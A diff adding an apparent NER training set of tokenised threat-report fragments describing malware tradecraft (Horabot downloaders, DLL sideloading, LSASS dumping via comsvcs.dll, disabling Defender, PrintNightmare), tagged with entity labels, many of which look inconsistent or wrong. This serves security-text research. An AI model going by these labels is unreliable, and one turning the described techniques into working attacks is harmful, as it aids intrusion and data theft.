"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "requests", + "a", + "data", + "stream", + "from", + "the", + "C2", + "server", + "through", + "the", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hosted", + "the", + "PowerShell", + "downloader", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hosted", + "the", + "ZIP", + "file", + "containing", + "the", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "a", + "RAR", + "file." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "PowerShell", + "downloader", + "script", + "from", + "an", + "attacker-controlled", + "server" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "a", + "ZIP", + "file" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "downloading" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "download", + "the", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "a", + "malicious", + "ZIP", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "drops", + "the", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "the", + "PowerShell", + "downloader", + "script", + "from", + "the", + "attacker-controlled", + "server" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "and", + "run", + "the", + "Horabot", + "“au”", + "using", + "the", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "files", + "from", + "a", + "URL" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloads", + "the", + "contents", + "of", + "an", + "HTML", + "file", + "stored", + "in", + "an", + "attacker-controlled", + "server" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "virtual", + "private", + "server", + "(VPS)", + "behind", + "which", + "the", + "attacker", + "has", + "parked", + "the", + "actual", + "command", + "and", + "control", + "(C2)", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "name", + "also", + "resembled", + "the", + "legitimate", + "Mexican", + "Tax", + "Agency", + "domain,", + "a", + "tactic", + "the", + "attacker", + "likely", + "adopted", + "to", + "disguise", + "malicious", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + "legitimate", + "AutoIt", + "interpreter." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "PowerShell", + "downloader" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "leads", + "to", + "payload", + "delivery", + "through", + "the", + "execution", + "of", + "a", + "PowerShell", + "downloader", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "RAR", + "file", + "contains", + "a", + "batch", + "file", + "with", + "a", + "CMD", + "extension" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "it", + "through", + "the", + "PowerShell", + "commands." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloading", + "and", + "executing", + "two", + "other", + "PowerShell", + "scripts", + "from", + "a", + "different", + "attacker-controlled", + "server." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "downloader", + "script,", + "which", + "the", + "attacker", + "attempts", + "to", + "execute", + "to", + "re-infect", + "the", + "victim’s", + "machine," + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "batch", + "file", + "downloads", + "the", + "PowerShell", + "downloaderThe" + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "a", + "malicious", + "batch", + "file", + "with", + "a", + ".cmd", + "extension", + "is", + "downloaded", + "to", + "the", + "user’s", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "an", + "embedded", + "PowerShell", + "command", + "to", + "download", + "the", + "next-stage", + "PowerShell", + "script", + "from", + "the", + "server", + "and", + "execute", + "it", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "two", + "other", + "malicious", + "batch", + "scripts", + "with", + "the", + "extension", + ".cmd", + "in", + "the", + "folder", + "“/Users/Public.”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "one", + "of", + "the", + "dropped", + "batch", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "executes", + "an", + "embedded", + "PowerShell", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "another", + "dropped", + "batch", + "file," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "a", + "PowerShell", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "the", + "payload", + "DLLs", + "and", + "a", + "few", + "legitimate", + "executables", + "and", + "DLLs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "sideloadingThis" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "sideloading", + "to", + "legitimate", + "executables" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "run", + "the", + "payloads", + "by", + "sideloading", + "them", + "to", + "the", + "legitimate", + "executables" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sideload", + "a", + "malicious", + "DLL" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "sideload", + "the", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sideloads", + "the", + "DLL", + "to", + "the", + "AutoIt", + "interpreter", + "process" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enticing", + "users", + "to", + "open", + "the", + "attached", + "malicious", + "HTML", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "lures", + "them", + "to", + "click", + "an", + "embedded", + "malicious", + "hyperlink", + "which" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "when", + "the", + "victim", + "opens", + "the", + "contents", + "of", + "the", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "user", + "opens", + "the", + "CMD", + "file," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "embedded", + "URL", + "is", + "launched", + "in", + "the", + "victim’s", + "browser," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "an", + "embedded", + "malicious", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "redirecting", + "to", + "another", + "malicious", + "HTML", + "file", + "from", + "an", + "attacker-controlled", + "AWS", + "EC2", + "instance." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "configured", + "to", + "run", + "the", + "payloads", + "in", + "the", + "startup", + "folder", + "of", + "the", + "victim’s", + "machine" + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "two", + "Windows", + "shortcut", + "files", + "in", + "the", + "Windows", + "startup", + "folder", + "using", + "the", + "Internet", + "Explorer", + "application", + "icon", + "and", + "the", + "target", + "paths", + "pointing", + "to", + "the", + "two", + "dropped", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "three", + "more", + "Windows", + "shortcut", + "files", + "in", + "the", + "victim’s", + "machine", + "startup", + "folder," + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "files", + "dropped", + "in", + "the", + "Windows", + "startup", + "folder", + "are", + "run" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "launches", + "several", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "heavily", + "obfuscated", + "with", + "random", + "symbols", + "that", + "substitute", + "the", + "instructions", + "during", + "the", + "run-time", + "and", + "base64-encoded", + "strings." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "alphanumeric", + "characters", + "and", + "the", + "special", + "character", + "“_”", + "to", + "generate", + "a", + "random", + "name", + "and", + "creates", + "a", + "folder", + "with", + "the", + "random", + "name", + "in", + "the", + "root", + "directory", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "the", + "compiled", + "AutoIt", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "evade", + "detection" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "encodes", + "the", + "email", + "addresses", + "in", + "the", + "“.Outlook”", + "file", + "to", + "a", + "data", + "stream" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "the", + "base64-encoded", + "strings", + "and", + "initializes", + "them" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "encrypted" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decryption", + "function", + "decrypts", + "the", + "URL", + "pointing", + "to", + "the", + "attacker-controlled", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malicious", + "ZIP", + "file", + "is", + "deleted." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deleting", + "the", + "“fb”", + "folder", + "to", + "cover", + "its", + "paths", + "and", + "avoid", + "detection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "writes", + "the", + "path", + "of", + "the", + "executable", + "file,", + "“_upyqta2_Ji7.exe”,", + "to", + "the", + "class’s", + "registry", + "key", + "“HKEY_CURRENT_USER\\software\\Classes\\ms-settings\\shell\\open\\command”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "screenshot", + "capturing" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "capturing", + "screenshots," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "capturing", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "anti-virus", + "software", + "information" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Checks", + "for", + "the", + "existence", + "of", + "the", + "anti-virus", + "products", + "such", + "as", + "AVG", + "and", + "Avast", + "by", + "checking", + "for", + "the", + "DLLs", + "avghookx.dll,", + "avghooka.dll", + "and", + "snxhk.dll" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "exfiltrated", + "to", + "the", + "attacker-controlled", + "server", + "through", + "an", + "HTTP", + "POST", + "request", + "to", + "the", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrates", + "the", + "email", + "address", + "to", + "the", + "C2", + "server", + "using", + "an", + "HTTP", + "POST", + "request" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrate", + "contacts’", + "email", + "addresses" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encoded", + "email", + "addresses", + "are", + "exfiltrated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "checking", + "if", + "a", + "file", + "on", + "the", + "victim’s", + "filesystem", + "exists", + "and", + "gets", + "the", + "file’s", + "attributes,", + "collecting", + "size", + "and", + "version", + "information," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "looks", + "for", + "the", + "Outlook", + "data", + "files", + "from", + "the", + "victim", + "profile’s", + "Outlook", + "application", + "data", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerates", + "all", + "folders", + "and", + "emails", + "in", + "the", + "victim’s", + "Outlook", + "data", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "login", + "data", + "from", + "the", + "Google", + "Chrome", + "user", + "profile", + "folders" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extracts", + "email", + "addresses", + "from", + "the", + "emails’", + "sender,", + "recipients,", + "CC", + "and", + "BCC", + "fields." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "SQL", + "queries", + "to", + "produce", + "the", + "database", + "tables", + "to", + "store", + "the", + "stolen", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "added", + "to", + "the", + "email", + "address", + "collection", + "array." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "writes", + "the", + "extracted", + "email", + "addresses", + "from", + "the", + "array", + "to", + "a", + "file", + "called", + "“.Outlook”", + "created", + "by", + "the", + "script", + "in", + "the", + "roaming", + "user", + "profile’s", + "Microsoft", + "application", + "data", + "folder." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Checks", + "the", + "registry", + "keys", + "to", + "detect", + "virtual", + "environments", + "such", + "as", + "VMWare,", + "Virtual", + "Box,", + "Wine,", + "Microsoft", + "Hyper-V", + "or", + "Windows", + "Virtual", + "PC." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "used", + "impacket", + "to", + "execute", + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "to", + "achieve", + "command", + "execution", + "on", + "other", + "systems", + "present", + "in", + "the", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "examples", + "of", + "the", + "command", + "line", + "syntax", + "used", + "for", + "the", + "performance", + "of", + "this", + "activity" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "adversary", + "using", + "Windows", + "Batch", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "performed", + "via", + "the", + "following", + "command-line", + "syntax" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "command-line", + "syntax", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "command-line", + "syntax", + "was", + "observed", + "being", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Windows", + "Command", + "Processor", + "was", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attacker", + "also", + "used", + "the", + "\"proxychains\"", + "utility,", + "which", + "is", + "often", + "employed", + "to", + "redirect", + "network", + "traffic" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "of", + "utilities", + "such", + "as", + "proxychains" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "adversary", + "leveraging", + "a", + "Windows", + "Service", + "to", + "execute", + "PowerShell", + "to", + "stay", + "persistent", + "in", + "the", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Windows", + "service", + "was", + "configured", + "with", + "the", + "following", + "options:Service", + "Type:", + "user", + "mode", + "service", + "Service", + "Start", + "Type" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "PowerShell", + "being", + "executed", + "was", + "Base64", + "encoded" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decoded", + "PowerShell", + "instructions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting," + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Disabling", + "PowerShell", + "logging" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Disabling", + "this", + "security", + "control" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "disable", + "remote", + "administration", + "restrictions", + "to", + "facilitate", + "lateral", + "movement", + "and", + "privilege", + "escalation", + "activities" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attacker", + "disabling", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Downloading,", + "decrypting,", + "and", + "executing", + "a", + "backdoor", + "payload", + "from", + "an", + "attacker-controlled", + "server" + ], + "ner_tags": [ + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "attacker", + "leveraging", + "Windows", + "Remote", + "Desktop", + "Connections", + "to", + "pivot", + "to", + "additional", + "systems", + "in", + "the", + "environment." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attacker", + "also", + "attempted", + "to", + "execute", + "PowerShell", + "scripts", + "on", + "remote", + "systems", + "in", + "the", + "environment", + "while", + "moving", + "system-to-system" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adversaries", + "copied", + "and", + "executed", + "the", + "aforementioned", + "PowerShell", + "script", + "on", + "multiple", + "systems", + "across", + "the", + "environment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comsvcs.dll", + "is", + "a", + "well-known", + "way", + "to", + "extract", + "LSASS", + "(Local", + "Security", + "Authority", + "Subsystem", + "Service)", + "data" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "invoking", + "comsvcs.dll", + "with", + "rundll32.exe,", + "an", + "adversary", + "can", + "create", + "a", + "dump", + "of", + "any", + "process" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "utilizing", + "comsvcs.dll" + ], + "ner_tags": [ + "O", + "B-Way" + ] + }, + { + "tokens": [ + "invoking", + "comsvcs.dll", + "with", + "rundll32.exe," + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "adversary", + "was", + "also", + "observed", + "remotely", + "modifying", + "the", + "Windows", + "Registry", + "on", + "remote", + "systems" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "modifying", + "the", + "Windows", + "Registry", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "adversary", + "attempting", + "to", + "exfiltrate", + "sensitive", + "information", + "over", + "SMB", + "(TCP/445)", + "directly", + "from", + "a", + "compromised", + "domain", + "controller." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actor", + "is", + "actively", + "exploiting", + "the", + "so-called", + "PrintNightmare", + "vulnerability", + "(CVE-2021-1675", + "/", + "CVE-2021-34527)", + "in", + "Windows'", + "print", + "spooler", + "service", + "to", + "spread", + "laterally", + "across", + "a", + "victim's", + "network" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "B-Features", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "screen", + "capture" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "SharePoint", + "vulnerability", + "CVE-2019-0604", + "was", + "used", + "to", + "deliver", + "web", + "shells" + ], + "ner_tags": [ + "O", + "O", + "B-Exp", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploited", + "the", + "Microsoft", + "SharePoint", + "vulnerability", + "CVE-2019-0604", + "to", + "install", + "web", + "shells" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "running", + "native", + "Windows", + "commands", + "on", + "compromised", + "servers," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "operators", + "made", + "a", + "consistent", + "effort", + "to", + "delete", + "these", + "tools", + "and", + "remove", + "any", + "residual", + "forensic", + "artifacts", + "from", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "consistently", + "cleaned", + "up", + "evidence", + "of", + "their", + "intrusion", + "after", + "gaining", + "access", + "to", + "a", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "moved", + "laterally", + "and", + "deployed", + "their", + "signature", + "malware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "this", + "access", + "to", + "deploy", + "and", + "remotely", + "execute", + "FOCUSFJORD", + "on", + "their", + "primary", + "target." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "operators", + "deleted", + "tools", + "used", + "for", + "credential", + "harvesting", + "and", + "internal", + "reconnaissance" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "delete", + "any", + "remaining", + "FOCUSFJORD", + "forensic", + "evidence,", + "including", + "files", + "on", + "disk,", + "configuration", + "data", + "encrypted", + "in", + "the", + "registry,", + "and", + "related", + "services", + "and", + "registry", + "keys", + "used", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "writes", + "its", + "encrypted", + "C2", + "configuration", + "into", + "the", + "system’s", + "registry" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "writes", + "its", + 